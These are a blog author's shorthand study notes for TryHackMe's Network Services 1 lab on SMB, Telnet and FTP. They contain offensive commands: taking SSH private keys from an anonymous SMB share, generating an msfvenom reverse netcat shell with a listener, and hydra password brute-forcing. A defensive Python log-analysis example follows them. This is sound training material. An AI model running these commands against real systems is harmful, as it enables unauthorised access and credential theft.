Are you going through TryHackMe’s Network Services 1 Room? Need help taking notes? I got you covered. Here are my Network Services 1 room notes from TryHackMe; use them as much as you need!

Disclaimer: this is written in shorthand format, meaning full sentences and proper grammar are not always used. For writeups, see SMB Part 1; for help with Linux, see Quick Start Guide.

SMB: Understanding, Enumerating, Exploiting

Server Message Block (SMB) Protocol: client/server comms for file/printer/serial ports/others for MS Windows.

  • Type: response-request protocol, transmits multiple messages to est connection.
  • Connections: TCP/IP (NetBIOS, NetBEUI, IPX/SPX).
  • SMB Commands (SMBs): if est connection, share files etc.
  • Support: Samba (open source server) for UNIX systems.


  • Install (ubuntu): enum4linux
    1. git clone <github URL>
    2. mv enum4linux.pl /usr/bin
    3. apt install smbclient
  • Access: smbclient
    1. smbclient -U Anonymous //<ip>/profiles
    2. ls, more "Working...txt"
    3. cd .ssh, ls, mget id_rsa*
    4. chmod 600 id_rsa, ssh -i id_rsa cactus@<ip>

Telnet: Understanding, Enumerating, Exploiting

Telnet: app protocol, connects/executes commands, non-secure clear text, replaced by ssh. Usage: telnet <ip> <port>.

  • Enumeration: doesn’t ‘jump out’ at us.
    1. sudo nmap -vv -T4 -p- <ip>
    2. nmap -vv -A -p 8012 <ip>
    3. s****** b******
  • CVE (Common Vuln and Exposures): listed public sec flaws, with IDs.
  • Shell: code/program to gain code/command execution.
  • Reverse Shell: target comms back to attack device, target has listening port.
    1. telnet <ip> <port> | CTRL + ] closes telnet.
    2. sudo tcpdump ip proto icmp -i tun0
    3. .RUN ping <my ip> -c 1
    4. msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R
    5. nc -lvp 4444
    6. .RUN <payload>

FTP: Understanding, Enumerating, Exploiting

File Transfer Protocol, allows remote (client/server) files transfers.

  • Two Channels: 1) command/control, transmits commands/replies, 2) data, transfers actual data.
  • Modes:
    • Active: client opens/listens, server actively connects.
    • Passive: server opens/listens, client connects.
  • Enumeration
    1. nmap -vv -T4 -Pn -p- <ip> & nmap -vv -A -p 21 <ip>
    2. ftp <ip>, anonymous, ls, more PUBLIC_NOTICE.txt
  • Exploit: command/data channels unencrypted
    1. hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt.gz -vV <ip> ftp
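Defender's view of the FTP steps above, as an added example (not from the room or the original notes): a log check that flags anonymous logins, bursts of failed logins per client and user, and a successful login that follows such a burst. It assumes vsftpd-style log lines; the sample log, IP addresses, threshold and window are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in vsftpd's log style (assumption: vsftpd login logging).
SAMPLE_LOG = """\
Mon Jan 15 10:00:01 2024 [pid 2101] [ftp] OK LOGIN: Client "10.0.0.7", anon password "?"
Mon Jan 15 10:02:10 2024 [pid 2150] [mike] FAIL LOGIN: Client "10.0.0.9"
Mon Jan 15 10:02:11 2024 [pid 2151] [mike] FAIL LOGIN: Client "10.0.0.9"
Mon Jan 15 10:02:12 2024 [pid 2152] [mike] FAIL LOGIN: Client "10.0.0.9"
Mon Jan 15 10:02:13 2024 [pid 2153] [mike] FAIL LOGIN: Client "10.0.0.9"
Mon Jan 15 10:02:14 2024 [pid 2154] [mike] OK LOGIN: Client "10.0.0.9"
Mon Jan 15 11:30:00 2024 [pid 2300] [alice] FAIL LOGIN: Client "10.0.0.12"
Mon Jan 15 11:30:20 2024 [pid 2301] [alice] OK LOGIN: Client "10.0.0.12"
"""

LINE = re.compile(r'^(?P<ts>\w{3} \w{3} +\d+ [\d:]{8} \d{4}) \[pid \d+\] '
                  r'\[(?P<user>[^\]]+)\] (?P<res>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def analyze(log_text, threshold=4, window=timedelta(seconds=60)):
    """Return (anonymous login IPs, brute-force bursts, successes after a burst)."""
    fails = defaultdict(list)             # (ip, user) -> recent failure timestamps
    anon, bursts, compromised = [], set(), []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue                      # skip non-login lines (connects, transfers)
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        key = (m["ip"], m["user"])
        if m["res"] == "FAIL":
            recent = [t for t in fails[key] if ts - t <= window] + [ts]
            fails[key] = recent
            if len(recent) >= threshold:
                bursts.add(key)           # many failures in a short window
        elif m["user"] in ("ftp", "anonymous"):
            anon.append(m["ip"])          # anonymous access is enabled and in use
        elif key in bursts:
            compromised.append(key)       # likely guessed password: rotate, review
    return anon, sorted(bursts), compromised

if __name__ == "__main__":
    anon, bursts, compromised = analyze(SAMPLE_LOG)
    print("anonymous logins from:", anon)
    print("brute-force bursts:", bursts)
    print("success after burst:", compromised)
```
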

This is Day 42 of #100DaysOfHacking, subscribe to my newsletter to see the CyberSec journey! If you like, follow the Learning Path for yourself, happy hacking.